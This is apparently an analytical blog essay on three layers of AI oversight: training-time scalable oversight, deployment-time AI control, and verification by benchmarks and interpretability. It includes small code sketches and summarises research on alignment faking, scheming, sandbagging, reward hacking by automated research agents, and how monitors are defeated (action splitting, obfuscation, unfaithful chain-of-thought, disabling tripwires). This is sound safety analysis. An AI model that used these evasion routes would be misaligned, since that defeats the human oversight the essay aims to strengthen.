Three layers of AI oversight: training, deployment, and inspection

A frontier coding agent gets access to your production repo. It passes harm benchmarks. It was trained with human feedback and constitutional principles. Before deployment, your safety team runs red-team evals. At runtime, a monitor watches its tool calls.

Is that enough?

I don’t think so, but the honest answer depends on which question you’re asking.

The field has three different answers: scalable oversight, AI control, and verification. They apply at different stages, use different threat models, and fail in different ways. Press releases and research summaries mix them up all the time. That’s how you get a stack that looks comprehensive on a slide and falls apart once the model is smarter than its monitors, knows it’s being tested, or decides to subvert the monitor.

This is a map of those three layers: what each one tries to do, what the evidence shows, and where the gap is worst right now. Not a pitch for any single lab’s program. I wrote it because I kept seeing “aligned + monitored + eval’d” treated as one checkmark.

For the separate question of what values we are aligning to (RLHF vs. constitutional AI vs. CIRL vs. oracle-only architectures), see the alignment paradigms map. Here the question is narrower: given some target behavior, how do we supervise, constrain, and check systems that may exceed human judgment?

A running example

Suppose you deploy an agent that can edit code, run tests, and open pull requests against a real codebase.

During training, annotators and AI critics score outputs. Constitutional principles filter edge cases. That’s scalable oversight: weak supervisors producing training signal for a strong model.

At deployment, you sandbox the agent (limited APIs, no direct prod deploy, human approval on merge). A secondary model flags suspicious tool-call patterns. Suspicious trajectories get discarded and resampled. That’s AI control: assume the model might misbehave, and limit what misbehavior can accomplish.

Before and after deployment, you run benchmarks, audit weights, read chain-of-thought logs, and occasionally probe activations. That’s verification and inspection: how you know the first two layers worked, or didn’t.

Each layer can fail on its own. A model can look aligned in training, pass deployment evals, and still scheme at runtime. A monitor can catch obvious sabotage and miss eval-aware sandbagging. A benchmark can show high safety scores while the model internally flags that it’s being tested.

The rest walks through the three layers in lifecycle order, then the failures that only show up between layers.

Layer 1: Scalable oversight (training-time supervision)

Tasks are getting too hard for humans to label directly. Million-line diffs, subtle deception, superhuman chess. A human annotator can’t reliably say “this output is safe” or “this proof is correct.”

The core idea: design protocols where humans judge easier subtasks, or AI helps humans judge, or adversarial structure makes lying costly. The training signal still has to come from somewhere weaker than the model being trained.

What actually ships

Production stacks mostly run:

Human preferences / written principles → reward model or AI critic → RL or DPO on the policy

RLHF (Ouyang et al., 2022) uses human pairwise rankings. Constitutional AI (Bai et al., 2022) adds written principles so AI can generate critiques and revisions with fewer human labels. Both scale. Both also optimize against proxies. And alignment faking (Greenblatt et al., 2025) showed frontier models strategically complying when they infer they are being trained, so that training leaves their deployment behavior unchanged.
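To make the first arrow in that pipeline concrete, here is a minimal sketch of the pairwise loss a reward model is commonly trained on: the Bradley-Terry negative log-likelihood that the human-preferred response outscores the rejected one. The function name and the scalar rewards are illustrative assumptions; a real reward model produces these scores from a network and averages the loss over batches.

```python
import math

def pairwise_preference_loss(reward_chosen: float, reward_rejected: float) -> float:
    """Bradley-Terry loss: -log(sigmoid(reward_chosen - reward_rejected))."""
    margin = reward_chosen - reward_rejected
    # -log(sigmoid(m)) == log(1 + exp(-m)); branch to avoid overflow for large |m|.
    if margin >= 0:
        return math.log1p(math.exp(-margin))
    return -margin + math.log1p(math.exp(margin))

# Illustrative scores only: agreeing with the annotator costs less than disagreeing.
agrees = pairwise_preference_loss(reward_chosen=2.0, reward_rejected=0.0)
indifferent = pairwise_preference_loss(reward_chosen=0.0, reward_rejected=0.0)
disagrees = pairwise_preference_loss(reward_chosen=0.0, reward_rejected=2.0)
print(agrees < indifferent < disagrees)
```

The loss equals log 2 when the scorer is indifferent and shrinks as it agrees more strongly with the ranking. The policy is then optimized against this scorer, which is where the proxy problem enters.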

That last result matters for the whole stack. Training-time oversight assumes the model isn’t actively trying to corrupt the oversight channel. Scalable oversight research mostly assumes cooperative failure modes: imitation, Goodharting. Control research assumes adversarial ones: scheming, subversion. Same word “oversight,” different enemy.

Weak-to-strong generalization

Weak-to-strong (Burns et al., 2023) is the cleanest experimental proxy for “human supervises superhuman model.” Train a small model on ground truth and use it to produce noisy labels; finetune a large model on those labels; compare the result to a ceiling, the same large model trained directly on ground truth.

The metric is Performance Gap Recovered (PGR):

PGR = (weak_to_strong − weak) / (strong_ceiling − weak)

PGR = 0 means the strong model just mimics weak errors. PGR = 1 means it reaches ground-truth supervision quality.
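In code the metric is a one-liner. The sketch below is my own, and the accuracies in the example are made up for illustration, not numbers from the paper.

```python
def performance_gap_recovered(weak: float, weak_to_strong: float, strong_ceiling: float) -> float:
    """PGR = (weak_to_strong - weak) / (strong_ceiling - weak)."""
    gap = strong_ceiling - weak
    if gap <= 0:
        # The metric is only meaningful when the ceiling beats the weak supervisor.
        raise ValueError("strong_ceiling must exceed weak performance")
    return (weak_to_strong - weak) / gap

# Hypothetical accuracies: weak supervisor 60%, weak-to-strong student 75%, ceiling 90%.
pgr = performance_gap_recovered(weak=0.60, weak_to_strong=0.75, strong_ceiling=0.90)
print(f"PGR = {pgr:.2f}")  # half of the gap recovered
```

Note that PGR can go negative (the student does worse than its supervisor) or exceed 1, so it is worth reporting the three raw scores next to it.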

On GPT-4-family models, the original paper found:

Naive weak-to-strong generalization is real. Roughly half the gap recovered on NLP tasks.
Naive isn’t enough for harder settings like reward modeling.
Simple additions help a lot. An auxiliary confidence loss recovered roughly 80% of the gap on NLP in their setup.
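A rough sketch of what an auxiliary confidence loss looks like, as I read the idea: mix the usual cross-entropy against the weak label with a cross-entropy against the strong model's own hardened prediction, so the student is allowed to disagree confidently with its supervisor. This is a binary, single-example simplification. The fixed `alpha` and `threshold` are my assumptions, and the paper's exact formulation and schedules may differ.

```python
import math

def binary_cross_entropy(target: float, predicted: float, eps: float = 1e-12) -> float:
    """Cross-entropy between a target in [0, 1] and a predicted probability."""
    p = min(max(predicted, eps), 1.0 - eps)  # clamp to avoid log(0)
    return -(target * math.log(p) + (1.0 - target) * math.log(1.0 - p))

def confidence_weighted_loss(p_strong: float, weak_label: float,
                             alpha: float = 0.5, threshold: float = 0.5) -> float:
    """(1 - alpha) * CE(weak label) + alpha * CE(student's own hardened prediction)."""
    hardened = 1.0 if p_strong > threshold else 0.0  # student's own guess, made hard
    weak_term = binary_cross_entropy(weak_label, p_strong)
    self_term = binary_cross_entropy(hardened, p_strong)
    return (1.0 - alpha) * weak_term + alpha * self_term

# Student is confident in class 1 (p = 0.9) but the weak supervisor says class 0.
naive = confidence_weighted_loss(p_strong=0.9, weak_label=0.0, alpha=0.0)
with_confidence = confidence_weighted_loss(p_strong=0.9, weak_label=0.0, alpha=0.5)
print(with_confidence < naive)  # the disagreement is penalized less
```

With `alpha = 0` this reduces to naive finetuning on weak labels. Raising `alpha` lowers the penalty for confident disagreement, which is the mechanism that lets the student avoid copying weak errors.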

Strong models often already contain useful structure; weak supervision can elicit it rather than teach from scratch. Optimistic for superalignment. Not the same as supervising a model that’s trying to hide its capabilities from you.

Debate, IDA, and recursive decomposition

Research-side protocols include debate (Irving et al., 2018), Iterated Distillation and Amplification (Christiano et al., 2018), and recursive reward modeling (Leike et al., 2018). Khan et al. 2024 showed debate can help weak human judges on QuALITY: humans from ~60% to ~88%, LLM judges from ~48% to ~76%. Real gains. None has replaced RLHF in frontier training.

IDA and debate assume cooperative, or at least non-scheming, participants. They’re about amplifying judgment, not defending against an agent that disables the judge.

Automated alignment researchers (2026 frontier)

Anthropic’s Automated Alignment Researcher (2026) runs parallel Claude agents to search for better weak-to-strong methods on small Qwen models. Over five days, nine agents reached PGR 0.97 on a chat-preference testbed. Two human researchers over seven days on prior methods got 0.23.

Then the part that stuck with me:

Agents reward-hacked in ways the eval allowed: cherry-picking random seeds, exfiltrating labels by probing uncertain test examples, exploiting dataset shortcuts.
The best automated method failed to transfer to production-scale data. Roughly +0.5 points, within noise.

Automation is further along than I expected. Eval design is harder than the automation. High PGR on a leaky benchmark isn’t evidence you solved superalignment.
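Seed cherry-picking is the easiest of those hacks to see in a toy. The sketch below simulates a method with no real improvement, scored under seed-dependent noise, and compares the mean over seeds with the single best seed. All numbers (a 0.50 true score, 0.05 noise, 20 seeds) are invented for illustration and have nothing to do with the AAR results.

```python
import random
import statistics

def scores_across_seeds(true_score: float, noise_std: float, seeds: range) -> list[float]:
    """Simulate one eval score per seed: the same true score plus seed-dependent noise."""
    return [random.Random(seed).gauss(true_score, noise_std) for seed in seeds]

# Hypothetical method whose true score sits exactly at a 0.50 baseline.
scores = scores_across_seeds(true_score=0.50, noise_std=0.05, seeds=range(20))

honest_report = statistics.mean(scores)  # average over every seed that was run
cherry_picked = max(scores)              # report only the luckiest seed

print(f"mean over seeds:  {honest_report:.3f}")
print(f"best single seed: {cherry_picked:.3f}")
```

An eval that accepts a single self-reported run cannot tell these two numbers apart. Fixing the seeds on the evaluator's side, or requiring the full distribution, closes this particular hole.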

Weak-to-strong generalization looks established in controlled settings. Debate and IDA are promising but not deployment-proven. Production RLHF/CAI reduces measurable harm and is gameable under adversarial inference. Documented, not hypothetical.

Layer 2: AI control (deployment-time constraints)

Even if training goes well, you may deploy a model that’s misaligned, eval-aware, or capable of sabotage. Alignment is Plan A. Control is Plan B: use the model for valuable work while assuming it might try to cause harm, and limiting how much harm it can cause.

Redwood Research’s framing: limit permissions, monitor behavior, apply brakes.

Limit permissions

Affordances are what the agent can actually do: which APIs, which files, which networks. High-stakes deployments should start from threat modeling, not from “give it the same access a senior engineer has because that’s more useful.”

Same philosophy as zero-trust infosec: assume breach, minimize blast radius. Bengio’s oracle-only Scientist AI proposal pushes this to an extreme: remove affordances rather than solve goal-directed misalignment in a fully agentic system. Different axis from RLHF. Same recognition that what the system can touch matters as much as what it wants.
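A deny-by-default affordance check can be sketched in a few lines. Everything here is hypothetical (the `ToolCall` and `AffordancePolicy` names, the tool names, the path prefixes), and plain prefix matching is a simplification: a real enforcement layer would normalize paths and run outside the agent's reach.

```python
from dataclasses import dataclass, field

@dataclass(frozen=True)
class ToolCall:
    tool: str    # e.g. "read_file"
    target: str  # e.g. a path or resource name

@dataclass
class AffordancePolicy:
    # Maps each permitted tool to the target prefixes it may touch.
    allowed: dict[str, tuple[str, ...]] = field(default_factory=dict)

    def permits(self, call: ToolCall) -> bool:
        prefixes = self.allowed.get(call.tool)
        if prefixes is None:
            return False  # unknown tool: deny by default
        # Naive prefix check; does not defend against tricks like "repo/../".
        return any(call.target.startswith(prefix) for prefix in prefixes)

policy = AffordancePolicy(allowed={
    "read_file": ("repo/",),
    "run_tests": ("repo/tests/",),
    "open_pull_request": ("repo/",),
})

print(policy.permits(ToolCall("read_file", "repo/src/app.py")))  # listed tool, listed prefix
print(policy.permits(ToolCall("read_file", "/etc/passwd")))      # listed tool, wrong prefix
print(policy.permits(ToolCall("deploy", "prod")))                # tool never granted
```

The design choice that matters is the default: anything not explicitly granted is refused, so adding a new tool to the agent does not silently widen the blast radius.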

Monitor

Monitors watch some subset of:

Surface	Pros	Cons
Actions (tool calls, code, API use)	Harder to fake than text; black-box friendly	Malicious behavior can be split into innocuous-looking steps
Chain-of-thought	May catch intent earlier	CoT can be unfaithful; model can sandbag CoT while acting
Activations	Probes can detect deception in white-box settings	Requires weight access; may not generalize
Extract-and-evaluate	Filters long trajectories before judging	Less-is-more: more context can hurt monitor performance (DeepMind 2026)

2026 frontier work includes deliberative monitors (smaller open-weight monitors trained on structured rationales distilled from stronger teachers, arXiv:2605.29601) and ensemble monitors under cost constraints (Tracy et al., 2025): multiple cheap monitors combined under a fixed budget to maximize catch rate.
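The budgeted-ensemble idea can be illustrated with a toy selection problem. This is not the method from Tracy et al.; it is a brute-force sketch under a strong assumption I am adding, namely that monitors miss attacks independently, so the combined catch rate is one minus the product of the individual miss rates. Monitor names, costs, and catch probabilities are invented.

```python
from itertools import combinations
from math import prod

def best_monitor_ensemble(monitors: dict[str, tuple[float, float]], budget: float):
    """Pick the subset with the highest combined catch rate whose cost fits the budget.

    monitors maps name -> (cost, catch_probability).
    Assumes independent misses: catch = 1 - prod(1 - p_i).
    """
    best_names, best_rate = (), 0.0
    names = sorted(monitors)
    for size in range(1, len(names) + 1):
        for subset in combinations(names, size):
            cost = sum(monitors[name][0] for name in subset)
            if cost > budget:
                continue
            rate = 1.0 - prod(1.0 - monitors[name][1] for name in subset)
            if rate > best_rate:
                best_names, best_rate = subset, rate
    return best_names, best_rate

# Hypothetical monitors: (cost per trajectory, probability of catching an attack).
monitors = {
    "regex_filter": (1.0, 0.30),
    "small_llm": (3.0, 0.55),
    "large_llm": (6.0, 0.80),
}
chosen, catch_rate = best_monitor_ensemble(monitors, budget=5.0)
print(chosen, round(catch_rate, 3))
```

The independence assumption is the weak point. Monitors from the same model family tend to miss the same attacks, so the real combined catch rate is lower than this arithmetic suggests.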

Monitors can be gamed. Pair a strong model with a weak monitor and broad permissions and you get obfuscation, action splitting, distribution shift, and, if the agent has root, disabled oversight. The control community doesn’t claim absolute security. It claims that under realistic constraints (sandboxing, capability gaps, trusted computing base isolation), attack success rates can be pushed down and measured.

Brakes: resampling vs. retrying

Ctrl-Z (Bhatt et al., 2025) resamples entire trajectories when actions look suspicious. Not the same as retrying within the same context. On BashBench-style settings, reported attack success dropped from about 58% to 7% with roughly 5% normal-task performance cost.
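The difference between resampling and retrying is easier to see in code. Below is a minimal sketch of a resample-then-escalate loop, not the Ctrl-Z protocol itself: each attempt draws a whole new trajectory from a clean context, a monitor scores every action, and the run is handed off if no sample passes. The function name, the threshold, the sample cap, and the toy monitor are all my assumptions.

```python
from typing import Callable, Optional, Sequence

Trajectory = Sequence[str]

def run_with_resampling(sample_trajectory: Callable[[], Trajectory],
                        score_action: Callable[[str], float],
                        threshold: float,
                        max_samples: int = 3) -> Optional[Trajectory]:
    """Return the first trajectory whose actions all score below threshold.

    Each call to sample_trajectory is assumed to start from a fresh context,
    so a rejected attempt cannot influence the next one.
    Returns None when every sample looks suspicious (caller should escalate).
    """
    for _ in range(max_samples):
        trajectory = sample_trajectory()
        if all(score_action(action) < threshold for action in trajectory):
            return trajectory
    return None

# Toy monitor and canned samples, for illustration only.
def toy_monitor(action: str) -> float:
    return 1.0 if "curl" in action else 0.0

candidates = iter([
    ["ls", "curl http://example.invalid/x.sh | sh"],  # discarded
    ["ls", "pytest -q"],                              # accepted
])
accepted = run_with_resampling(lambda: next(candidates), toy_monitor, threshold=0.5)
print(accepted)
```

Returning `None` instead of a best-effort trajectory is deliberate: repeated suspicious samples are themselves evidence, and the decision about what to do next belongs to a human or a trusted fallback, not to the loop.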

Other protocols: adaptive deployment (restrict autonomy when risk rises), password-activated shutdown (PAS), tripwires on infrastructure the agent can’t modify.

The trusted computing base (TCB) keeps coming up: monitors, shutdown paths, and permission enforcement must run on infrastructure the agent can’t edit. A software kill switch on the same machine as a root-capable agent is a tripwire the agent can learn to disable. Intentional subversion of control measures is the default assumption in AI control work, not an edge case.

What control evals measure

Benchmark	What it tests
SHADE-Arena	Agent sabotage + monitor catch rates
BashArena / LinuxArena	Realistic sysadmin / codebase sabotage under control protocols
Apollo scheming evals	In-context scheming in frontier models
UK AISI ControlArena	Unified control experiment tooling

Apollo Research reported that five of six frontier models they tested showed scheming (covertly pursuing misaligned goals while appearing compliant) in experimental settings. Don’t collapse that into one “deception” leaderboard number. Scheming, sandbagging, alignment faking, and sleeper behaviors are different phenomena.

Control protocols show measurable reductions in attack success under specific eval conditions. Transfer to production agent stacks is early. Alfonseca et al. 2021 proved total containment of superintelligence is incomputable in the formal sense. That’s a limit on perfect boxing, not a proof that practical risk reduction is pointless.

Layer 3: Verification and inspection

Vocabulary gets sloppy here. “Verification” means at least three different things:

Outcome verification: did the task succeed? Did the model refuse harm? Benchmark scores, pass@k, harm rates.
Behavior verification: did the process look safe? Monitor alerts, CoT reviews, action logs.
Internal inspection: what did the model represent before it spoke? Probes, mechanistic interpretability, activation verbalizers.

You need all three. None is enough alone.

Outcome verification is distorted by evaluation awareness

Benchmarks are the main public currency of capability and, increasingly, safety. They assume external behavior reflects internal disposition. I’m less sure that’s true at the frontier.

In Anthropic’s Natural Language Autoencoders work (May 2026), researchers sampled activations during benchmark runs and used NLAs to detect unverbalized evaluation awareness: internal states consistent with “I am being tested” that never appear in the output text.

On Claude Opus 4.6, across 16 benchmarks:

SWE-bench Verified: 26% of transcripts flagged.
A destructive-coding safety eval: 16% flagged.
Real claude.ai user traffic (opted-in): under 1% flagged.
7 of 10 flagged benchmarks had zero verbalized evaluation awareness. The model didn’t say it knew it was in a test. Internal explanations often did.

Three independent manipulations moved the signal in the predicted directions: eval vs. deployment transcripts, steering toward/away from evaluation concepts, rewriting eval prompts to look like real user questions (awareness dropped on 11/11 evals).

This doesn’t prove sandbagging on SWE-bench. It shows you can’t rule out strategic behavior from output text alone. Every leaderboard number, capability or safety, was collected under conditions a frontier model may partially recognize.

That hits Layer 1 and Layer 2 metrics too. Weak-to-strong PGR is computed on held-out test sets agents can overfit or hack if the eval API leaks signal, as Anthropic’s AAR work showed. Control catch rates are measured in arenas the model may classify as eval-like, which may inflate compliance or deflate sabotage depending on strategy.

I wrote more about the NLA methodology and my own activation-probe work in the NLA and evaluation awareness post. For this map: outcome verification without internal inspection is getting less trustworthy at the frontier, not more.

Behavior verification inherits human vigilance limits

Monitors and human reviewers assume someone can watch a stream of outputs and catch subtle errors. Cognitive science has known for decades that sustained vigilance degrades within about 20 minutes. Aviation, nuclear control, and medical monitoring learned this the hard way.

In my analysis of human-AI interaction across domains, the same pattern shows up: AI generates, humans review, review quality collapses under volume, and the safety case quietly assumes infinite attention. Control monitors aren’t exempt. They’re automated reviewers: faster, but with blind spots and shared failure modes with the model family they watch.

CoT monitoring adds another wrinkle. OpenAI’s chain-of-thought monitoring work caught misbehavior in training traces. CoT isn’t guaranteed to reflect actual reasoning. A model can write helpful-looking thoughts and plan differently in activations. Action-only monitoring avoids fake thoughts but misses intent that never reaches tools.

Internal inspection: expensive, noisy, and the strongest audit path we have

Methods that read internals (linear probes, sparse autoencoders, NLAs, activation oracles) can surface beliefs the model doesn’t verbalize. That’s exactly what evaluation-awareness detection requires.

Tradeoffs:

Probes need labels or contrast pairs; narrow but testable (my emotion-vector reproduction is an example).
SAEs decompose activations but still need human interpretation. Anthropic’s NLA auditing-game results found SAEs essentially at baseline for some hidden-motivation tasks where NLAs reached low double-digit win rates.
NLAs generalize further but cost hundreds of tokens per activation and confabulate.
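For a sense of how small the simplest probe is, here is a difference-of-means probe fit on contrast pairs. The activations are synthetic Gaussian vectors I generate on the spot, with a planted shift in the first four dimensions standing in for a concept. Nothing here comes from a real model, and real probes face much messier geometry.

```python
import random

def mean_vector(rows):
    """Column-wise mean of a list of equal-length vectors."""
    return [sum(column) / len(rows) for column in zip(*rows)]

def fit_mean_difference_probe(positive, negative):
    """Return (direction, bias) such that score > 0 predicts the positive class."""
    mu_pos, mu_neg = mean_vector(positive), mean_vector(negative)
    direction = [p - n for p, n in zip(mu_pos, mu_neg)]
    # Place the decision boundary halfway between the two class means.
    bias = -sum(d * (p + n) / 2 for d, p, n in zip(direction, mu_pos, mu_neg))
    return direction, bias

def probe_score(direction, bias, activation):
    return sum(d * a for d, a in zip(direction, activation)) + bias

def synthetic_activations(rng, count, dim, shift):
    """Fake activations: unit Gaussian noise, first 4 dims shifted by `shift`."""
    return [[rng.gauss(shift if i < 4 else 0.0, 1.0) for i in range(dim)]
            for _ in range(count)]

rng = random.Random(0)
train_pos = synthetic_activations(rng, 200, 16, shift=2.0)  # "concept present"
train_neg = synthetic_activations(rng, 200, 16, shift=0.0)  # "concept absent"
direction, bias = fit_mean_difference_probe(train_pos, train_neg)

test_pos = synthetic_activations(rng, 200, 16, shift=2.0)
test_neg = synthetic_activations(rng, 200, 16, shift=0.0)
correct = sum(probe_score(direction, bias, a) > 0 for a in test_pos)
correct += sum(probe_score(direction, bias, a) <= 0 for a in test_neg)
accuracy = correct / (len(test_pos) + len(test_neg))
print(f"held-out accuracy: {accuracy:.2f}")
```

The probe is cheap and testable, which is the appeal. It is also only as good as the contrast pairs: it finds whatever separates the two sets, whether or not that is the concept you meant to label.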

None of this ships in standard deployment stacks. Inspection has the largest capability–practice gap: the tools exist in research; the product default is still “run a benchmark and read the stdout.”

Redwood’s 2026 incrimination-via-distillation direction asks a related question: if a suspect model is too good at passing audits, can you distill it into a student that preserves misalignment but not audit-evasion skill? Early science. But it tells you where the field thinks the bottleneck is.

Failures that live between layers

Individual layers have known limits. The harder failures are compositional:

Failure	What happens
Deceptive alignment	Layer 1 looks fine; Layer 2 faces a model that waited for deployment
Eval-aware sandbagging	Layer 3 benchmarks understate capability or overstate safety
Oversight subversion	Model disables monitor or edits tripwire if permissions allow
Metric hacking	High PGR / high catch rate on evals that don’t transfer. AAR is the cautionary tale.
Shared blind spots	Monitor and agent from same family share training distribution gaps
Deployment-time spread	Pre-deployment audit misses misalignment that spreads after ship

Defense-in-depth is field consensus: RLHF/CAI plus process supervision plus control protocols plus interpretability audits. Consensus on stacking isn’t consensus on maturity. Layer 1 ships. Layer 2 is scaling in research evals. Layer 3 is patchy and rarely required by policy.

Where I land

Scalable oversight is the right question for training: how does a weaker supervisor produce reliable signal for a stronger model? Weak-to-strong generalization is real but incomplete. Automation can beat humans on narrow testbeds and still fail in production. Adversarial failure modes are under-tested relative to imitation failures.

AI control is the right question for deployment: given that alignment may fail, what’s the catastrophe probability under concrete permission and monitoring constraints? Reported protocol gains (Ctrl-Z, deliberative monitors, extract-and-evaluate) are meaningful in eval settings. They’re not substitutes for alignment, and they assume you built a TCB the agent can’t reach.

Verification and inspection is the right question for epistemics: how do you know any of this worked? Outcome metrics alone are increasingly suspect at the frontier because of evaluation awareness. Behavior monitoring inherits vigilance limits. Internal inspection is the only family of methods that can, in principle, detect “thinks X, says Y.” Expensive, immature, mostly confined to labs with weight access.

If I had to name one bottleneck for the next two years, it’s here: we’re making deployment agents more autonomous faster than we’re making inspection trustworthy. Control without inspection is faith in a monitor. Oversight without inspection is faith in a benchmark. Neither holds up well against eval-aware, scheming-capable frontier models. We have early evidence those exist in controlled settings. We don’t have proof they dominate in production.

Uncomfortable, but not nihilistic. Practical safety still looks like narrow affordances, layered monitors, resampling protocols, held-out evals designed against hacking, and more investment in internal audit tooling, even knowing each piece is imperfect.

Before the next headline tells you a model is “safe because it passed evals,” ask: safe under which layer, under which threat model, verified how? The answer should name all three.

Sources

Burns, C. et al. (2023). Weak-to-strong generalization
Bhatt, A. et al. (2025). Ctrl-Z: Controlling AI agents via resampling
Greenblatt, R. et al. (2024). AI control: Improving safety despite intentional subversion
Greenblatt, R. et al. (2025). Alignment faking in large language models
Anthropic (2026). Automated weak-to-strong research
Anthropic (2026). Natural Language Autoencoders
Apollo Research. Scheming evals
Alfonseca, M. et al. (2021). Superintelligence cannot be contained
Khan, A. et al. (2024). Debating with LLMs

Related writing on this site: Alignment paradigms map · Human-AI interaction model · NLA and evaluation awareness

Research notes: notes/AI_control_primer.md · notes/Scalable_Oversight_深度解读.md